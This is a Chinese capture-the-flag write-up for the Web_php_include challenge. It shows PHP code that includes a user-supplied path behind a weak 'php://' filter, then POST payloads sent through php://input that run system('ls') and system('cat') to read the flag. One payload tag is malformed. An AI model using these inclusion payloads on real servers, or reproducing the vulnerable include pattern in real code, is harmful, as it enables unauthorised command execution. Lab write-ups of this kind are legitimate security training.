Web_php_include 攻防世界

复制代码
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {    以是否检测到php://为判断执行循环
    $page=str_replace("php://", "", $page);//传入空值,替换
}
include($page);
?>

综上分析,get方式好像挺难去看到这个flag的,因为这种代码下的flag通常放在一个文件中,需要先展开ls,然后在cat查看。那我们就尝试用post传参

准备好一个Firefox 一个max hackbar

通过php伪协议php://input

首先post传入第一个命令 ,这个命令用来展开目录

复制代码
<php
system("ls")
?>

随后得到fl4gisisish3r3.php 一般这种文件就是flag,

我们使用

复制代码
<?php
system("cat fl4gisisish3r3.php ")//查看文件下的flag
?>

有的flag会直接在屏幕上,有的就藏在背后i的代码里,这个就是

相关推荐
三七吃山漆10 小时前
攻防世界——wife_wife
前端·javascript·web安全·网络安全·ctf
亿.61 天前
2025鹏城杯 Web
java·安全·web·ctf·鹏城杯
小肖爱笑不爱笑1 天前
2025/12/16 HTML CSS
java·开发语言·css·html·web
Z3r4y1 天前
【AI】2025 0x401新生交流赛 wp
人工智能·ai·ctf·wp
f0rev3r1 天前
PCTF-Maze
ctf
合天网安实验室2 天前
2025铸剑杯线下赛AI安全渗透复现
ctf·web渗透·ai安全·大模型安全·2025铸剑杯
小白勇闯网安圈2 天前
upload、very_easy_sql、i-got-id-200
python·网络安全·web
0和1的舞者2 天前
SpringBoot配置文件
java·spring boot·后端·web·配置·spirng
saulgoodman-q2 天前
Pwncollege V8 Exploitation (中)
pwn·ctf
Chen--Xing2 天前
DASCTF 2025下半年|矩阵博弈,零度突围 Crypto -- Serration详解
密码学·ctf·buuctf·crypto·dasctf